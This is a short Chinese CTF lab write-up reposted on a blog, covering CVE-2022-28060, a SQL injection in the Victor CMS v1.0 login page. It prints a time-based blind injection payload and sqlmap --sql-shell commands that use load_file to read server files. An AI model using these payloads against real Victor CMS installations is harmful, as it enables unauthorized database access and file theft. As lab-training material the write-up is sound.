overfit同步小助手

2023-06-28 11:08:48

春秋云境：CVE-2022-28060

春秋云境：CVE-2022-28060

文章合集：春秋云境系列靶场记录（合集）

Victor CMS v1.0 sql注入：CVE-2022-28060

在这里插入图片描述

漏洞介绍

Victor CMS v1.0 /includes/login.php 存在sql注入

解题步骤

访问URL，在登录过程中抓包：
探测存在SQL注入：1'+AND+(SELECT*FROM+(SELECT+SLEEP(5))a)+AND+'1'='
使用Sqlmap获取flag，通过–sql-shell再传入load_file进行文件读取：

python sqlmap.py -r 1.txt --sql-shell -v
select load_file('/flag')

在这里插入图片描述

文章合集：春秋云境系列靶场记录（合集）

标签：安全漏洞 web安全网络安全

本文转载自: https://blog.csdn.net/laobanjiull/article/details/128106023
版权归原作者 Acczdy 所有，如有侵权，请联系我们删除。

发表评论

登录后发布评论

“春秋云境：CVE-2022-28060”的评论:

还没有评论

关于作者

overfit同步小助手

文章同步

相关阅读

如何给SaaS应用做安全

【软件测试】自动化常用函数

postman变量和脚本功能介绍

Python Selenium常见的报错以及措施

idea导出配置文件

如何在visual studio中生成并使用dll和lib文件

Docker homeassistant 反向代理外网访问

文章导航